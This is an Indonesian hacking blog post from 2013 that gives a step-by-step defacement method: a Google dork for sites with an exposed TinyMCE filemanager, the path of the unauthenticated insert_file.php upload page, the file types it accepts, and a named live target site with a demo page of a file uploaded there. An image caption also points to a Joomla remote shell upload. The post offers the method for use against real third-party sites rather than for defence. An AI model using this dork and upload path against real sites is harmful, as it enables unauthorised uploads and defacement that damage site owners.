Monday, 16 September 2013
ane tdi lgi iseng-iseng'an googling eh ketemu cara ini ya dahg deh ane coba.
langsung aja biar ga penasaran kita ke TKP
Dork: inurl:/tiny_mce/plugins/filemanager
Exploit: http://localhost/PATH/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Diizinkan Berkas: html ,pdf ,ppt ,txt ,doc ,jpg, etc except php, php4, asp
Live Target: http://rofel.pl/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Demo: http://rofel.pl/upload/crots.html
NB:
Cara ini tidak bisa Mengubah indexnya OKey :D
Semoga Bermanfaat ^_^
#Jangan Lupa, Tinggalkan Komentarnya :D
![Deface Dengan Joomla Component [Com_Fabrik] Remote Shell Upload Vulnerability](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgcL8PDM-K4TjX8EOa9r3IJjRuq8WijIbB55mX7gNaPlJVja_-IUX0WLmNvlQ_eaQ4dac1eTpoHj-zR3IuETd2XwTdWV2lKY3z7J_Y_zmhqm8BbvrvWmR72SeP2wi8kL3WBORXwqIALhOaO/s72-c/step1.png)
